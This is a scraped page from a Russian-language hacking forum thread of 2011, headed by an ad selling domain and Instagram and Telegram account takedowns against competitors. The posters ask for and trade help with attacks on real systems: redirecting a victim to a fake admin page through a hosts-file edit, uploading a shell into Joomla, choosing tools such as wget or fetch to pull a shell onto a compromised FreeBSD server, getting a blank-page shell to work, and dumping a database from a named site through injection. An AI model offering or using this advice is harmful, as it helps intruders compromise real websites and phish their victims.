УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1677 из 2438

1677

Опции темы

Поиск в этой теме

Опции просмотра

#16761

01.04.2011, 22:17

fl00der

Постоянный

Регистрация: 17.12.2008

Сообщений: 353

Провел на форуме:
919131

Репутация: 74

Цитата:

Сообщение от SMerCH47

SMerCH47 said:
Вопрос:
Можно ли как нибудь сделать чтобы жертва заходя на адрес
www.sait.ru/admin попадала на фэйк к примеру salt.ru/admin , Либо в www.sait.ru/admin открывался фрэйм фэйка, Доступ к компу жертвы есть но неполноценный.
портал xss-уязвим, но не факт что в момент доступа к компу сохраниться куки.

Насколько доступ "неполный"?

Если можешь заливать/править файлы, подними фейк на дедике с белым IP и кинь жертве в хостс соответствующую запись, после ребута он попадет на фейк при заходе.

Лучше всего протесть все у себя для начала.

Цитата:

Сообщение от Moriarty

Moriarty said:
Кроме как через "установка модулей", как в джумлу залиться? (ver. 1.5.9)

Любой другой инсталлер (модули, мамботы и т.д.), шаблоны, менеджер языков.

Если все не канает, пробуй залиться через какой-либо из установленных компонентов, если есть аплоад, пробуй заливаться всюду, где он есть.

#16762

01.04.2011, 22:36

SMerCH47

Новичок

Регистрация: 05.02.2010

Сообщений: 0

Провел на форуме:
14902

Репутация: 0

Цитата:

Сообщение от fl00der

fl00der said:
Насколько доступ "неполный"?
Если можешь заливать/править файлы, подними фейк на дедике с белым IP и кинь жертве в хостс соответствующую запись, после ребута он попадет на фейк при заходе.
Лучше всего протесть все у себя для начала.

Доступ у стороннего человека, может вставить флэшку не на долгое время.. если бы я был уверен что в куки храниться то все можно было бы решить по средствам xss и соц. инженерии..

"подними фейк на дедике с белым IP и кинь жертве в хостс" - расшифруй это..я не хацкер, я простой юзер -)

Еще есть мысль Батником отредактировать закладки если сайт в них есть

#16763

02.04.2011, 13:51

FlaktW

Участник форума

Регистрация: 19.08.2009

Сообщений: 115

Провел на форуме:
111014

Репутация: 8

Цитата:

Сообщение от Moriarty

Moriarty said:
Да там видио косяк с путями! Я уже встречал такое на пхпбб...как только заливка чего либо завершается - выводится ошибка о неправильных путях... =\

Помогите разобраться с синтаксисом. Сервер под FreeBSD, как правильно составить команду, чтобы залить шелл?

rcp -p /usr/local/www/httpdocs/shell.php http://site.ru/shell.php

#16764

02.04.2011, 14:22

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью ICQ

Отправить сообщение для Gorev с помощью Yahoo

Цитата:

Сообщение от FlaktW

FlaktW said:
Помогите разобраться с синтаксисом. Сервер под FreeBSD, как правильно составить команду, чтобы залить шелл?
rcp -p /usr/local/www/httpdocs/shell.php http://site.ru/shell.php

wget, get, curl,fetch,lynx

#16765

02.04.2011, 14:28

FlaktW

Участник форума

Регистрация: 19.08.2009

Сообщений: 115

Провел на форуме:
111014

Репутация: 8

Цитата:

Сообщение от Gorev

Gorev said:
wget, get, curl,fetch,lynx

Это FreeBSD и установлены:

/usr/bin/fetch

/bin/rcp

/bin/cp

/usr/bin/scp

#16766

03.04.2011, 15:53

FlaktW

Участник форума

Регистрация: 19.08.2009

Сообщений: 115

Провел на форуме:
111014

Репутация: 8

Помогите вывести БД.

http://skazka.nsk.ru/trick.29/id,40'/

#16767

03.04.2011, 19:18

Unknown

Guest

Сообщений: n/a

Провел на форуме:
28895

Репутация: 4

При заходе на шелл пустая страница. Как быть? .htaccess нет возможности переписать.

#16768

03.04.2011, 20:11

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Отправить сообщение для Tigger с помощью ICQ

Цитата:

Сообщение от Lijzer

Lijzer said:
При заходе на шелл пустая страница. Как быть? .htaccess нет возможности переписать.

1. Может быть антивирус, попробуй другой шелл.

2. Может быть нет интерпритации php\или она отключена => попробуй perl\python шелл.

Попробуй . Если не выводит, то проблема в PHP.

#16769

03.04.2011, 21:03

Unknown

Guest

Сообщений: n/a

Провел на форуме:
28895

Репутация: 4

Цитата:

Сообщение от Tigger

Tigger said:
1. Может быть антивирус, попробуй другой шелл.
2. Может быть нет интерпритации php\или она отключена => попробуй perl\python шелл.
Попробуй . Если не выводит, то проблема в PHP.

На перле залил шелл акцесс денайд.

>>> выводит

>>> не выводит

Как же обойти?

#16770

03.04.2011, 21:04

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

Lijzer

смотря конечно же что конкретно фильтруется

Страница 1677 из 2438

1677

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход